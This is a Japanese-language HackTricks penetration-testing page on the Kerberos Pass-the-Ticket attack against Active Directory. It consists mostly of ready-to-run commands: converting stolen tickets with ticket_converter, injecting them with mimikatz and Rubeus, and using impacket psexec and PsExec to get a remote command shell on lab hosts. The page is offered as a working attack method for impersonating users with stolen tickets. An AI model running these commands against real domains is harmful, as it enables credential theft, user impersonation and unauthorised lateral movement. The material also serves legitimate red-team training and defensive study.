hacktricks/src/windows-hardening/active-directory-methodology/pass-the-ticket.md

パス・ザ・チケット

{{#include ../../banners/hacktricks-training.md}}

パス・ザ・チケット (PTT)

パス・ザ・チケット (PTT) 攻撃手法では、攻撃者は ユーザーの認証チケットを盗む ことで、パスワードやハッシュ値を盗むのではありません。この盗まれたチケットは、ユーザーを偽装する ために使用され、ネットワーク内のリソースやサービスへの不正アクセスを得ることができます。

読む:

• Windowsからのチケットの収集
• Linuxからのチケットの収集

プラットフォーム間でのLinuxとWindowsのチケットの交換

ticket_converter ツールは、チケット自体と出力ファイルを使用してチケット形式を変換します。

python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

WindowsではKekeoが使用できます。

パス・ザ・チケット攻撃

export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass

#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

参考文献

• https://www.tarlogic.com/blog/how-to-attack-kerberos/

{{#include ../../banners/hacktricks-training.md}}